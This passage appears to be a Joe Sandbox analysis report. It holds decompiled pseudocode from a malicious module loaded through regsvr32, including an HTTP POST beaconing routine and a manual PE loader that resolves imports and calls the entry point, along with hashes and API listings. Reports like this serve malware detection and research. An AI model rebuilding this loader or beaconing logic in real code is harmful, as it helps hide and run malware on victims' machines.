							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E02BCA1F8(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x2bdf8f0; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E02BCA1F8(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E02BCF6E9(_t116);
									}
									_t117 = E02BC9F6B(0x82e);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x2bdf8f0; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E02BCA5D0(_t193), _a4, _a8);
									E02BC8D87( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E02BCA1F8(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E02BC8F63( &_v20, 0, _t122);
										_t127 =  *0x2bdf8f0; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E02BCA102( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x2bdf8f0; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x2bdf8f0; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x2bdf8f0; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x2bdf8f0; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x2bdf8f0; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x2bdf8f0; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x2bdf8f0; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x2bdf8f0; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x2bdf8f0; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}

0x02bcf7b1
0x02bcf7bd
0x02bcf7c4
0x02bcf7d1
0x02bcf7d4
0x02bcf7e5
0x02bcf7ef
0x02bcf7fa
0x02bcf807
0x02bcf814
0x02bcf821
0x02bcf824
0x02bcf829
0x02bcf82e
0x02bcf830
0x02bcf838
0x02bcf840
0x02bcf847
0x02bcf853
0x02bcf856
0x02bcf864
0x02bcf867
0x02bcf86d
0x02bcf86e
0x02bcf870
0x02bcf879
0x02bcf87a
0x02bcf87f
0x02bcf885
0x02bcf88f
0x02bcf88f
0x02bcf891
0x02bcf896
0x02bcf8a0
0x02bcf8ab
0x02bcf8b4
0x02bcf8b6
0x02bcf8b8
0x02bcf8c7
0x02bcf8de
0x02bcf8e4
0x02bcf8e7
0x02bcf8eb
0x02bcf8ed
0x02bcf8f2
0x02bcf8f2
0x02bcf8f7
0x02bcf8f9
0x02bcf90f
0x02bcf913
0x02bcf918
0x02bcf91a
0x02bcf91a
0x02bcf92e
0x02bcf939
0x02bcf93c
0x02bcf93f
0x02bcf942
0x02bcf947
0x02bcf94c
0x02bcf94c
0x02bcf94f
0x02bcf951
0x02bcf977
0x02bcf97b
0x02bcf97f
0x02bcf97f
0x02bcf989
0x02bcf991
0x02bcf996
0x02bcf9a1
0x02bcf9a7
0x02bcf9b1
0x02bcf9b4
0x02bcf9b9
0x02bcf9bd
0x02bcf9c2
0x02bcf9c2
0x02bcf9c7
0x02bcf9cb
0x02bcfa16
0x02bcfa18
0x02bcfa1b
0x02bcfa23
0x02bcfa27
0x02bcfa2a
0x02bcfa3c
0x02bcfa47
0x02bcfa49
0x02bcfa5d
0x02bcfa62
0x02bcfa67
0x02bcfa9c
0x02bcfaa1
0x02bcfaa6
0x02bcfaa8
0x00000000
0x02bcfaa8
0x02bcfa6b
0x02bcfa6e
0x02bcfa6e
0x02bcfa74
0x02bcfa77
0x02bcfa7a
0x02bcfa7a
0x02bcfa7c
0x02bcfa7e
0x02bcfa84
0x02bcfa84
0x02bcfa87
0x02bcfa89
0x02bcfa8b
0x02bcfa92
0x02bcfa92
0x00000000
0x02bcfa95
0x02bcfa4b
0x02bcfa51
0x00000000
0x02bcf9cd
0x02bcf9cd
0x02bcf9d3
0x02bcf9d9
0x02bcf9dc
0x02bcf9e1
0x02bcf9e6
0x02bcf9e9
0x02bcf9ee
0x02bcf9ee
0x02bcf9f1
0x02bcf9f4
0x00000000
0x02bcf9f4
0x02bcf953
0x02bcf953
0x02bcf959
0x02bcf95f
0x02bcf962
0x02bcf967
0x02bcf96a
0x02bcf96d
0x02bcf96f
0x00000000
0x02bcf96f
0x02bcf8fb
0x02bcf8fb
0x02bcf901
0x02bcf907
0x02bcf9f7
0x02bcf9f7
0x02bcf9f7
0x00000000
0x02bcf9f7
0x02bcf8f9
0x02bcf8ba
0x02bcf9f9
0x02bcf9fc
0x02bcf9fe
0x02bcfa01
0x02bcfa04
0x02bcfa04
0x02bcfa0d
0x02bcfa0f
0x00000000
0x00000000
0x02bcfa13
0x00000000
0x02bcfa13
0x02bcf889
0x00000000

APIs

memset.MSVCRT ref: 02BCF7D4
memset.MSVCRT ref: 02BCF7E5

Part of subcall function 02BC8F63: memset.MSVCRT ref: 02BC8F75

GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 02BCF8BA

Strings

POST, xrefs: 02BCF933

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 628e9cfab05fe80b6663e1fdd14458a6144931b81f7bbcae15bd9edf8b2f0157
Instruction ID: 746fcb7dc68e7e324f76f0da8274dea8fb78b12f892c272c9611936b1e7395a0
Opcode Fuzzy Hash: 628e9cfab05fe80b6663e1fdd14458a6144931b81f7bbcae15bd9edf8b2f0157
Instruction Fuzzy Hash: 16A13C71D41219EFDB14EFA4D888AFEB7B9EF08310F2444AAE516E7250EB749A40CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02BD14C5 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 02BD1545
qsort.MSVCRT ref: 02BD17C3

Strings

null, xrefs: 02BD150A
true, xrefs: 02BD151C
false, xrefs: 02BD1528
%I64d, xrefs: 02BD1537

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: f96500d1eabb521019ff310e6145baa99f45a1da0e9ac6f1b1f6592ceb77a57d
Instruction ID: e250ce9b7cfa264aa92b8bc5e67bb94de674785bd7486485f9b35e4ffaae1bd4
Opcode Fuzzy Hash: f96500d1eabb521019ff310e6145baa99f45a1da0e9ac6f1b1f6592ceb77a57d
Instruction Fuzzy Hash: 93E17EB191020ABBEF159E68CC41FEF3B69EF05358F004095FD1A9A151F736DA61CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BC503F Relevance: 9.2, APIs: 6, Instructions: 247
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02BC503F(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				short _v588;
				WCHAR* _v592;
				WCHAR* _v596;
				intOrPtr _v600;
				char _v628;
				char _v632;
				void* __ebx;
				void* __esi;
				short _t47;
				WCHAR* _t54;
				WCHAR* _t55;
				intOrPtr _t56;
				signed int _t61;
				void* _t65;
				void* _t66;
				WCHAR* _t67;
				intOrPtr _t68;
				WCHAR* _t70;
				intOrPtr _t71;
				WCHAR* _t73;
				WCHAR* _t83;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				void* _t99;
				void* _t100;
				WCHAR* _t101;
				void* _t112;
				WCHAR* _t116;
				intOrPtr _t127;
				void* _t128;
				void* _t146;
				WCHAR* _t149;
				void* _t150;
				void* _t152;
				void* _t156;
				WCHAR* _t157;
				WCHAR* _t159;
				signed int _t160;
				signed int _t161;
				intOrPtr* _t163;
				signed int _t165;
				void* _t168;
				void* _t169;
				intOrPtr* _t170;
				void* _t175;

				_t175 = __fp0;
				_push(_t160);
				_t99 = __edx;
				_t156 = __ecx;
				_t161 = _t160 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
				_v592 = 1;
				if(_t156 != 0) {
					_t94 =  *0x2bdf8d4; // 0x483fc00
					_t96 =  *0x2bdf8d8; // 0x483fab0
					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x110)))));
				}
				if(E02BCCB85(_t156) != 0) {
					L4:
					_t47 = E02BCC85A();
					_push(_t99);
					_v588 = _t47;
					E02BCC64D(_t47,  &_v580, _t173, _t175);
					_t100 = E02BC4FFB( &_v580,  &_v580, _t173);
					_t112 = E02BCE34A( &_v580, E02BCA5D0( &_v580), 0);
					E02BCC870(_t112,  &_v548, _t175);
					_push(_t112);
					_t54 = E02BC3174(_t156,  &_v580, _t173, _t175);
					_v596 = _t54;
					if(_t54 != 0) {
						_push(0);
						_push(_t100);
						_push(0x2bdc9d8);
						_t55 = E02BC9C50(_t54);
						_t169 = _t168 + 0x10;
						_t101 = _t55;
						__eflags = _v592;
						if(__eflags != 0) {
							_t56 = E02BC9AB3(_v596);
							_t116 = _t101;
							 *0x2bdf990 = _t56;
							 *0x2bdf988 = E02BC9AB3(_t116);
							L12:
							_push(_t116);
							_t157 = E02BCA7C6( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
							_t170 = _t169 + 0x10;
							__eflags = _t157;
							if(_t157 == 0) {
								goto L36;
							}
							_push(0x2bdca26);
							_t146 = 0xe;
							E02BCAC36(_t146, _t175);
							E02BCAC6F(_t157, _t175, _t101);
							_t163 = _a4;
							_push( *_t163);
							E02BCAC11(0xb);
							_t148 =  *(_t163 + 0x10);
							__eflags =  *(_t163 + 0x10);
							if( *(_t163 + 0x10) != 0) {
								E02BCB1B1(_t148, _t175);
							}
							_t149 =  *(_t163 + 0xc);
							__eflags = _t149;
							if(_t149 != 0) {
								E02BCB1B1(_t149, _t175);
							}
							_t65 = E02BCA1F8(0);
							_push(_t149);
							_t150 = 2;
							_t66 = E02BCABE3();
							__eflags = _v592;
							_t127 = _t65;
							if(_v592 == 0) {
								_t127 =  *0x2bdf8d4; // 0x483fc00
								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
								if(__eflags != 0) {
									_t67 = E02BD0DDF(_t66, _t101, _t150, _t175, 0, _t101, 0);
									_t170 = _t170 + 0xc;
									goto L21;
								}
								_t127 = _t127 + 0x228;
								goto L20;
							} else {
								_t68 =  *0x2bdf8d4; // 0x483fc00
								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
								if(__eflags != 0) {
									L27:
									__eflags =  *(_t68 + 0x1898) & 0x00000082;
									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
										_t152 = 0x64;
										E02BCF15B(_t152);
									}
									E02BC565D( &_v580, _t175);
									_t159 = _a8;
									_t128 = _t127;
									__eflags = _t159;
									if(_t159 != 0) {
										_t71 =  *0x2bdf8d4; // 0x483fc00
										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
											lstrcpyW(_t159, _t101);
										} else {
											_t73 = E02BC109A(_t128, 0x153);
											_v596 = _t73;
											lstrcpyW(_t159, _t73);
											E02BC8D9A( &_v596);
											 *_t170 = "\"";
											lstrcatW(_t159, ??);
											lstrcatW(_t159, _t101);
											lstrcatW(_t159, "\"");
										}
									}
									_t70 = _a12;
									__eflags = _t70;
									if(_t70 != 0) {
										 *_t70 = _v588;
									}
									_t161 = 0;
									__eflags = 0;
									goto L36;
								}
								_t32 = _t68 + 0x228; // 0x483fe28
								_t127 = _t32;
								L20:
								_t67 = E02BC58D2(_t127, _t101, __eflags);
								L21:
								__eflags = _t67;
								if(_t67 >= 0) {
									_t68 =  *0x2bdf8d4; // 0x483fc00
									goto L27;
								}
								_push(0xfffffffd);
								L6:
								_pop(_t161);
								goto L36;
							}
						}
						_t83 = E02BCD210(_v588, __eflags);
						_v596 = _t83;
						_t84 =  *0x2bdf8d0; // 0x483f8c0
						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
						__eflags = _t85 - _t161;
						if(_t85 != _t161) {
							_t86 =  *0x2bdf8d0; // 0x483f8c0
							 *((intOrPtr*)(_t86 + 0x30))();
							E02BC8DDF( &_v632, _t161);
							_t116 = _t85;
							goto L12;
						}
						E02BC8DDF( &_v628, _t161);
						_t61 = 1;
						goto L37;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t93 = E02BC308A( &_v532, _t161, 0x105);
					_t173 = _t93;
					if(_t93 == 0) {
						L36:
						_t61 = _t161;
						L37:
						return _t61;
					}
					goto L4;
				}
			}

0x02bc503f
0x02bc504c
0x02bc5057
0x02bc505c
0x02bc505e
0x02bc5061
0x02bc5066
0x02bc5069
0x02bc5073
0x02bc5075
0x02bc5082
0x02bc508b
0x02bc508b
0x02bc5098
0x02bc50b3
0x02bc50b5
0x02bc50ba
0x02bc50bf
0x02bc50c5
0x02bc50d4
0x02bc50f3
0x02bc50f5
0x02bc50fa
0x02bc5101
0x02bc5106
0x02bc510d
0x02bc5117
0x02bc5119
0x02bc511a
0x02bc5120
0x02bc5125
0x02bc5128
0x02bc512a
0x02bc512f
0x02bc5196
0x02bc519b
0x02bc519d
0x02bc51a7
0x02bc51ac
0x02bc51ac
0x02bc51c6
0x02bc51c8
0x02bc51cb
0x02bc51cd
0x00000000
0x00000000
0x02bc51d3
0x02bc51da
0x02bc51dd
0x02bc51e6
0x02bc51eb
0x02bc51f1
0x02bc51f6
0x02bc51fb
0x02bc51ff
0x02bc5201
0x02bc5205
0x02bc5205
0x02bc520a
0x02bc520d
0x02bc520f
0x02bc5213
0x02bc5213
0x02bc521a
0x02bc521f
0x02bc5223
0x02bc5226
0x02bc522b
0x02bc5231
0x02bc5232
0x02bc525a
0x02bc5260
0x02bc5267
0x02bc5276
0x02bc527b
0x00000000
0x02bc527b
0x02bc5269
0x00000000
0x02bc5234
0x02bc5234
0x02bc5239
0x02bc5240
0x02bc5285
0x02bc5285
0x02bc528c
0x02bc5290
0x02bc5291
0x02bc5291
0x02bc529b
0x02bc52a0
0x02bc52a3
0x02bc52a4
0x02bc52a6
0x02bc52a8
0x02bc52ad
0x02bc52b4
0x02bc52f7
0x02bc52b6
0x02bc52bb
0x02bc52c3
0x02bc52c7
0x02bc52d2
0x02bc52dd
0x02bc52e5
0x02bc52e9
0x02bc52f1
0x02bc52f1
0x02bc52b4
0x02bc52fd
0x02bc5300
0x02bc5302
0x02bc5308
0x02bc5308
0x02bc530a
0x02bc530a
0x00000000
0x02bc530a
0x02bc5242
0x02bc5242
0x02bc5248
0x02bc524a
0x02bc524f
0x02bc524f
0x02bc5251
0x02bc5280
0x00000000
0x02bc5280
0x02bc5253
0x02bc5111
0x02bc5111
0x00000000
0x02bc5111
0x02bc5232
0x02bc5135
0x02bc5143
0x02bc5156
0x02bc515b
0x02bc5161
0x02bc5163
0x02bc517b
0x02bc5180
0x02bc5189
0x02bc518f
0x00000000
0x02bc518f
0x02bc516b
0x02bc5174
0x00000000
0x02bc5174
0x02bc510f
0x00000000
0x02bc509a
0x02bc50a5
0x02bc50ab
0x02bc50ad
0x02bc530c
0x02bc530c
0x02bc530e
0x02bc5314
0x02bc5314
0x00000000
0x02bc50ad

APIs

memset.MSVCRT ref: 02BC5061
lstrcpyW.KERNEL32 ref: 02BC52C7
lstrcatW.KERNEL32(00000000,?), ref: 02BC52E5
lstrcatW.KERNEL32(00000000,00000000), ref: 02BC52E9
lstrcatW.KERNEL32(00000000,02BDCA28), ref: 02BC52F1

Part of subcall function 02BC8DDF: HeapFree.KERNEL32(00000000,00000000), ref: 02BC8E25

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrcat$FreeHeaplstrcpymemset
String ID:
API String ID: 911671052-0
Opcode ID: 4f0b09125035a47411edb8540e63c355bdf9352c263a4d288edcb71f561bd475
Instruction ID: d35fe013dfd6d69b57194d63bbfad0579bec5990fafc421f0172c17f3c1ca19c
Opcode Fuzzy Hash: 4f0b09125035a47411edb8540e63c355bdf9352c263a4d288edcb71f561bd475
Instruction Fuzzy Hash: 6E71E2316443019BD724EB24DC54BBB77EAEFC4720F3449AEF456AB280EB70A9448B52

Uniqueness

Uniqueness Score: -1.00%

Function 02BCDEAB Relevance: 9.1, APIs: 6, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E02BCDEAB(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x2bdc9d8);
						_t36 = E02BC9C50( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E02BC8DDF( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}

0x02bcdeb4
0x02bcdebb
0x02bcdebe
0x02bcdecb
0x02bcded1
0x02bcded4
0x02bcded6
0x02bcdedb
0x02bcdfb3
0x02bcdfb3
0x02bcdfb3
0x00000000
0x00000000
0x00000000
0x00000000
0x02bcdee1
0x02bcdee1
0x02bcdee1
0x02bcdee4
0x02bcdeea
0x02bcdf06
0x02bcdf0d
0x02bcdf13
0x02bcdf17
0x02bcdf2b
0x02bcdf2b
0x02bcdf2e
0x00000000
0x00000000
0x00000000
0x00000000
0x02bcdf19
0x02bcdf19
0x02bcdf1e
0x02bcdf22
0x02bcdf22
0x02bcdf26
0x02bcdf27
0x00000000
0x02bcdf19
0x02bcdf2f
0x02bcdf2f
0x02bcdf32
0x02bcdf33
0x02bcdf3a
0x02bcdf44
0x00000000
0x00000000
0x02bcdf46
0x02bcdf4c
0x02bcdf50
0x02bcdfa9
0x02bcdf59
0x02bcdf66
0x02bcdf6c
0x02bcdf6e
0x02bcdf75
0x02bcdf7b
0x02bcdf83
0x02bcdf8b
0x02bcdf97
0x02bcdf9d
0x00000000
0x02bcdfaf
0x02bcdf3c
0x00000000

APIs

GetCommandLineW.KERNEL32 ref: 02BCDEC0
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 02BCDECB
lstrlenW.KERNEL32 ref: 02BCDF0D
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 02BCDF66
lstrcpynW.KERNEL32(?,00000000,00000104), ref: 02BCDF8B
lstrcpynW.KERNEL32(?,?,00000104), ref: 02BCDFA9

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
String ID:
API String ID: 1259063344-0
Opcode ID: 363d067ef6701042e8e6c34233e72703b90afb89307e451f1e8803473e5de443
Instruction ID: de8def6bb85b4a987e332e71e2170039263e945b89ea42db01598d4f950680b2
Opcode Fuzzy Hash: 363d067ef6701042e8e6c34233e72703b90afb89307e451f1e8803473e5de443
Instruction Fuzzy Hash: 3731F579D00116ABEF24AB55D888BADB7F8FF00355F2045EEE405E3150EB709990CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BCE6D9 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 02BCE6ED
SysAllocString.OLEAUT32(?), ref: 02BCE6F5
SysAllocString.OLEAUT32(00000000), ref: 02BCE709
SysFreeString.OLEAUT32(?), ref: 02BCE784
SysFreeString.OLEAUT32(?), ref: 02BCE787
SysFreeString.OLEAUT32(?), ref: 02BCE78C

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: abfe58b48aa8b1fc881ded9010d54acf5bbf350cab07b588a7257bd9f729d245
Instruction ID: 6201c5669eb873d6e4aa9b349bf47f389ec5afc5a4ce715965475290073233de
Opcode Fuzzy Hash: abfe58b48aa8b1fc881ded9010d54acf5bbf350cab07b588a7257bd9f729d245
Instruction Fuzzy Hash: F921FC75900218FFDB00DFA5CC88DAEBBBDEF48654B2044AAE505E7250DB71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02BD3DC7 Relevance: 7.8, APIs: 5, Instructions: 322
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E02BD3DC7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
